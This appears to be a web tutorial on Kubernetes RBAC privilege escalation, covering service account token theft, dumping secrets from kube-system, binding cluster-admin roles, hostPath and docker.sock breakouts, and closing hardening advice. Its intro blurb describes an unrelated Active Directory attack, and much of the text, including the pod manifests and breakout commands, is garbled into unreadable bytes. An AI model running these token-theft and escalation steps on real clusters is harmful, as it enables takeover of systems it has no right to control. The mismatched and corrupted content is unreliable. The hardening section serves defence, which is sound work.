Master Active Directory intra-forest trust exploitation. Learn how child domain compromise leads to full parent forest escalation via SID History injection (ExtraSIDs), Kerberos Golden Ticket
25 min read
Basic Linux command-line familiarity, basic understanding of Docker containers and Kubernetes architecture.
Author: Syed Zida Abrar
0� Executive Summary & Step-0 Intuition
BLUF (Bottom Line Up Front): Kubernetes RBAC (Role-Based Access Control) privilege escalation occurs when an attacker compromises a pod or service account token possessing over-privileged permissions (such as
create pods,impersonate,bindorpatch) and uses those permissions to gain cluster-admin rights or escape to the host node.
To master Kubernetes security, you must first understand the fundamental control plane architecture. Kubernetes is an orchestrated cluster of physical or virtual nodes managed by a central control plane. The core API server (kube-apiserver) acts as the single point of entry for a�����������Ʌѥٔ�ɕ�Օ��̰�����ѕȁ���Ʌѥ��̰�������������չ���ѥ��̸(((�������������������������������������������
, KUBERNETES CLUSTER |
0 |
0 +---------------------------------+- +--------------------------------+ |
0 | CONTROL PLANE | | WORKER NODE | |
0 | | | | |
0 | +-----------------------------+- | REST | +----------------------------+- | |
0 | | kube-apiserver | |<------ | | kubelet daemon | | |
0 | +-------------+--------------+ | HTTPS | +------------+-------------+ | |
0 | | | | | | |
0 | v | | v | |
0 | +-----------------------------+ | | +-----------------------------+ | |
0 | | etcd database | | | | Target Pod / SA Token | | |
0 | +----------------------------+- | | +----------------------------+- | |
0 +---------------------------------+ +--------------------------------+ |
+>�����������������������������������������()ٕ�������չ�������ͥ�����-Չ�ɹ�ѕ́����ѕȁ�́��ѽ��ѥ����䁅�ͥ���������M��٥�����չШ��չ���́�������ѱ䁑�ͅ������]�����������͍́���ձ����-Չ�ɹ�ѕ́��չ�́��)]P�ѽ����ɕ�ɕ͕�ѥ���ѡ�́M��٥�����չЁ���)��مȽ�ո�͕�ɕ�̽�Չ�ɹ�ѕ̹���͕�٥������չнѽ����()%�������х���ȁ=�х��́�ɉ��Ʌ�䁍�����ᕍ�ѥ�����ͥ����������٥��I
��ME1����ȁ����ɽ��͕���������ѥ����ɕ���ѥ��̤��ѡ�́M��٥�����չЁѽ����������́ѡ��ȁ�ɥ������ٽЁٕ�ѽȁ��Ѽ�ѡ��-Չ�ɹ�ѕ́A$�((���()# 1. Initial Reconnaissance: Extracting and Validating Pod ServiceAccount Tokens
When you gain shell access inside a compromised pod, your first step is enumerating mounted cluster credentials and evaluating your permissions against the kube-apiserver.
Run the following commands inside the container terminal to locate the mounted token, namespace, and target API server IP:
m�!
cd /var/run/secrets/kubernetes.io/serviceaccount/ ls -la
cat namespace
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token) CACERT="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt" APISERVER="https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS:}"
echo "Target API Server: ${APISERVER}" g
C## Enumerating Self-Permissions with kubectl auth can-i
If kubectl is installed inside the pod (or downloaded via curl), run a comprehensive permission check:
m�!
kubectl auth can-i --list
kubectl auth can-i create pods kubectl auth can-i impersonate users kubectl auth can-i create rolebindings
If kubectl is unavailable, execute raw HTTPS requests using curl directly against the API server REST endpoints:
m�!
curl -s --cacert $CACERT
-H "Authorization: Bearer $TOKEN"
$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews
-H "Content-Type: application/json"
-d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectRulesReview","spec":{"namespace":"default"}}' | jq .
g
0� 2. Attack Vector #1: Exploiting the create pods Permission (HostPath Mount Breakout)
h> BLUF: Having the create verb on pods in a namespace allows an attacker to launch a privileged pod mounting the underlying host's root filesystem (/), granting full root access to the physical or virtual worker node.
When a user or service account can create pods, RBAC policies often fail to restrict the pod's securityContext or volume definitions (unless admission controllers like Pod Servity Standards / OPA Gatekeeper are enforced). By mounting the host root directory / into /mnt/host inside a new pod, you bypass container isolation completely.
priv-pod.yaml)��P���fW'6���c����C��@��WFFF����S���7B�F�V�fW"��@���W76S�FVfV�@�7V3����7E�C�G'VP���7D�WGv�&��G'VP�6��F��W'3�����S�&��B�6�V�����vS����S��FW7@�6����C��"�&���6�"�"�2"�'6�VW%Т6V7W&�G�6��FW�C��&�f��VvVC�G'VP�f��V�T��V�G3�����V�EF�����B���7@���S���7B�&��@�f��V�W3�����S���7B�&��@���7EF���F���G�S�F�&V7F�'���()�̌�Mѕ���������A�������ᕍ�є�!��Ё �ɽ��()���(�����䁵������Ё�ͥ���͕�٥�������չЁѽ���)�Չ��Ѱ�����䀵���ɥص����兵�((��]��Ё��ȁ�����ɕ�ѥ��������х��́Iչ����)�Չ��Ѱ���Ё�������ех���ٕȵ������((��ᕍ�є���ѕɅ�ѥٔ�͡������ͥ���ѡ����ݱ䁍ɕ�ѕ�����)�Չ��Ѱ��ᕌ���Ё���ех���ٕȵ������������͠((��=������ͥ���ѡ�����х���ȁ͡�������ɽ�Ё��Ѽ����Ёɽ�Ё�������ѕ�)��ɽ�Ѐ���н���Ѐ�������͠)�
C"3# Verification & Impact
You now possess a full root shell directly on the Kubernetes worker node host! From here, you can:
/var/lib/kubelet/pods/.#2 3. Attack Vector #2: Service Account Token Theft via pods/exec or Secrets Access
h> BLUF: Possessing get, list, or watchpermissions on secrets or createverb on pods/exec permits an attacker to steal high-privilege tokens assigned to system service accounts (such as cluster-admin or monitoring daemons).
If your service account has get or list permissions on secrets in the kube-system or target namespace:
m�!
kubectl get secrets -n kube-system
SECRET_NAME=$(kubectl get secrets -n kube-system --field-selector type=kubernetes.io/service-account-token -o jsonpath='{.items[0].metadata.name}')
kubectl get secret $SECRET_NAME -n kube-system -o jsonpath='{.data.token}' | base64 --decode g���2#2266V�&��#�'W6��r�G2�W�V6F�GV�F��V�2g&��'V���r�G0���b��R�76W727&VFVW&֗76�����F�R�G2�W�V67V'&W6�W&6R���R6�W�V7WFR6����G2��6�FR��B��F�R��W76^( F��6�VF��r��v��&�f��VvRF֖�7G&F�fR�G3���ڲ�2�FV�F�g�F&vWB�G2��F�RF&vWB��W76P��V&V7F�vWB�G2��F&vWB���W76P��2W�V2��F�F&vWB6��F��W"�BW�G&7B��V�FVBF��VষV&V7F�W�V2��F&vWB���W76RF&vWB��B���R��6B�f"�'V��6V7&WG2��V&W&�WFW2���6W'f�6V66�V�B�F��V�p
0� 4. Attack Vector #3: Impersonation & RBAC Privilege Escalation(impersonate, bind, patch)J
BLUF: Specific RBAC verbs (
impersonate,bind,escalate) allow immediate privilege escalation without needing pod creation capabilities.
If your account has impersonate verb on users or serviceaccounts resources:
ڲ�2��W'6��FR7�7FVӦ�7FW'2F֖�w&�WF�&V7Fǒ���V&V7F�6����G0��V&V7F�vWB�G2���3�7�7FVӦF֖���2�w&�W�7�7FVӦ�7FW'0��27&VFR6�W7FW"�F֖�&��T&��F��r2��W'6��FVBW6W ��V&V7F�7&VFR6�W7FW'&��V&��F��rv��F֖�����6�W7FW'&��S�6�W7FW"�F֖�����W6W#�7�7FVӦF֖�p
C"3# Vector 3.2: Creating Malicious RoleBindings (bind / create rolebindings)
If you hOld create permission on rolebindings or clusterrolebindings, you can attach existing powerful roles (like cluster-admin or admin) to your current low-privilege ServiceAccount:
2jiB�X[\�\��[ێ���X˘]]ܚ^�][ۋ��˚[�B��[���\�\���P�[�[�Y]Y]N���[YN��K\�]�Y\��[][ۂ��X��X��H�[���\��X�PX���[���[YN���\��Z\�Y\�B��[Y\�X�N�Y�][���T�Y����[���\�\���B��[YN��\�\�XYZ[��\Qܛ�\���X˘]]ܚ^�][ۋ��˚[���ǒF�R&��F��s���m�! kubectl apply -f sa-priv-escalation.yaml kubectl auth can-i --list
0� 5. Container Breakout Techniques: From Container Shell to Node Root
Beyond RBAC misconfigurations, container breakouts leverage misconfigured kernel capabilities or exposed unix sockets.
/var/run/docker.sock)If a container mounts /var/run/docker.sock (common in CI/CD build agents):
ڲ�2VW'�F�6�W"FV���fW'6���f���V�FVB6�6�W@�7W&��2��V旂�6�6�WB�f"�'V��F�6�W"�6�6��GG�����6Ɔ�7B�fW'6��ࠢ27v���7B�&�f��VvVB6��F��W"f�F�6�W"��7W&��2��V旂�6�6�WB�f"�'V��F�6�W"�6�6�Ԃ$6��FV�B�G�S�Ɩ6F�����6��"��Ղ�5B�GG�����6Ɔ�7B�6��F��W'2�7&VFR���Bw�$��vR#�&���R"�$6�B#��"�&���6�"�"�2"�&6�&��B���&���&6�%��$��7D6��f�r#��$&��G2#��"���%��%&�f��VvVB#�G'VW��p��27F'B6��F��W"�BGF6��2&WGW&�26��F��W"�BR�r�&#&36CB��� �4��D��U%��C�B�7W&��2��V旂�6�6�WB�f"�'V��F�6�W"�6�6�Ԃ$6��FV�B�G�S�Ɩ6F�����6��"Ղ�5B�GG�����6Ɔ�7B�6��F��W'2�7&VFR�Bw�$��vR#�&���R"�$6�B#��'6�VW"�#%��$��7D6��f�r#��$&��G2#��"����B���7B%���r���"�B���7W&��2��V旂�6�6�WB�f"�'V��F�6�W"�6�6�Ղ�5B&�GG�����6Ɔ�7B�6��F��W'2�G�4��D��U%��w��7F'B �p()�̌� ɕ����Ѐ������ɽ�́1����� �������ѥ�̀�� A}MeM}5%9�� A}MeM}AQI ��()%�����Ё���х���ȁ��������ѥ���((j�B���X���\��[�Y��X�]�H�\X�[]Y\�\�K\�[����Y��T��T��QRS�\��\�[�[�[����ܛ�\܈]�X�H\�X�B�Z�\��\��ܜ ��[�[�]�ܛ�\[�Y[[ܞH�ܛ�\�\��ܜ�Z�\��\��ܜ��X��H��\��ܜ�ۛ�Y�W�ۗܙ[X\�B����]I �Y[� ��ˊ�\�\�JJ�K���K� ������[�[��B�X������]��Y���\��ܜܙ[X\�W�Y�[���X�� ��Kؚ[��� ����Y�X����]^� ���]��]]�����Y��[� ���Y���X��X����\��ܜ���ܛ�\����Ȃ��]��]]������Р��b�WF��FVBVF�B67&�C�VF�F��r�V&W&�WFW2$$2&�6�0��W6RF��26�V����v��W&f�&��6R�F���67&�BF�VF�B�6�W7FW"f�"��v��&�6�$$2֗66��f�wW&F���2WF��F�6�Ǔ����+a�p�2�W7"�&���V�b�F���0�2Ң�6�F��s�WFbӂҢТ7G'VP�"" ��V&W&�WFW2$$26V7W&�G�VF�F� �WF��#�7�VB��F'&"��G&�V�FW7FW"��FW67&�F���VF�G26W'f�6T66�V�G2�B6�W7FW%&��W2f�"��v��&�6�$$2W66�F���fW&'2�"" �����'B7V'&�6W70����'B�6�খ��'B7�0��$�4���dU$%2��"�"�&7&VFR"�'WFFR"�'F6�"�&��W'6��FR"�&&��B"�&W66�FR'Х$�4���$U4�U$4U2��"�"�'�G2"�'6V7&WG2"�'&��W2"�'&��V&��F��w2"�&6�W7FW'&��W2"�&6�W7FW'&��V&��F��w2"�'6W'f�6V66�V�G2'Р�FVbvWE�6�W7FW%�&��W2����6�B��&�V&V7F�"�&vWB"�&6�W7FW'&��V&��F��w2"�"��"�&�6��%Т&W2�7V'&�6W72�'V�6�B�6GW&U��WGWC�G'VR�FW�C�G'VR���b&W2�&WGW&�6�FR���&��B�b%���W'&�"VW'���r6�W7FW'&��V&��F��w3��&W2�7FFW''�"��&WGW&���FF��6�����G2�&W2�7FF�WB��&��B�#�����t�$�4�4�U5DU"$��R$��D��u2TD�B���"��f�"�FV���FF�vWB�&�FV�2"��ғ����R��FVղ&�WFFF%ղ&��R%Т&��U�&Vb��FVղ'&��U&Vb%ղ&��R%Т7V&�V7G2��FV��vWB�'7V&�V7G2"��Ґ����b&��U�&Vb���&6�W7FW"�F֖�"�&F֖�%Ӡ�&��B�b%�5$�D�4��&��F��rw���W�rw&�G2w�&��U�&Vg�rF�7V&�V7G3�"��f�"7V"��7V&�V7G3��&��B�b"����C��7V"�vWB�v���Br�����S��7V"�vWB�v��Rr�����W76S��7V"�vWB�v��W76Rr�t��r��"����b����U����%�������#��vWE�6�W7FW%�&��W2���p
0� 7. Enterprise Hardening & Real-Time Falco Detection Engineering
T//o defend against Kubernetes privilege escalation, adopt a defense-in-depth posture combining strict RBAC, Pod Security Standards, and runtime behavioral monitoring.
Enforce namespace-level pod security admission controls to block privileged containers, hostPath volume mounts, and host PID namespaces:
ɩ� iampVersion: v1 kind: Namespace metadata: name: production-apps labels: pod-security.kubernetes.io/enforce: restricted pod-security.kubernetes.io/enforce-version: latest g���2#22'V�R#�F�6&�RWF��F�26W'f�6T66�V�BF��V���V�F��p��f�"v�&���G2F�BF���B&WV�&R66W72F�F�R�V&W&�WFW2�6W'fW"�6WBWF���V�E6W'f�6T66�V�EF��V�f�6R��F�R�B7V3���ɩ� iampVersion: v1 kind: ServiceAccounw metadata: name: isolated-sa namespace: default automountServiceAccountToken: false g
C"3# Rule 3: Enterprise Falco Runtime Detection Rule
Deploy this custom Falco rule to detect pod creation with host root volume mounts in real time:
ɩ�
Share this tutorial
Sign in to leave a comment.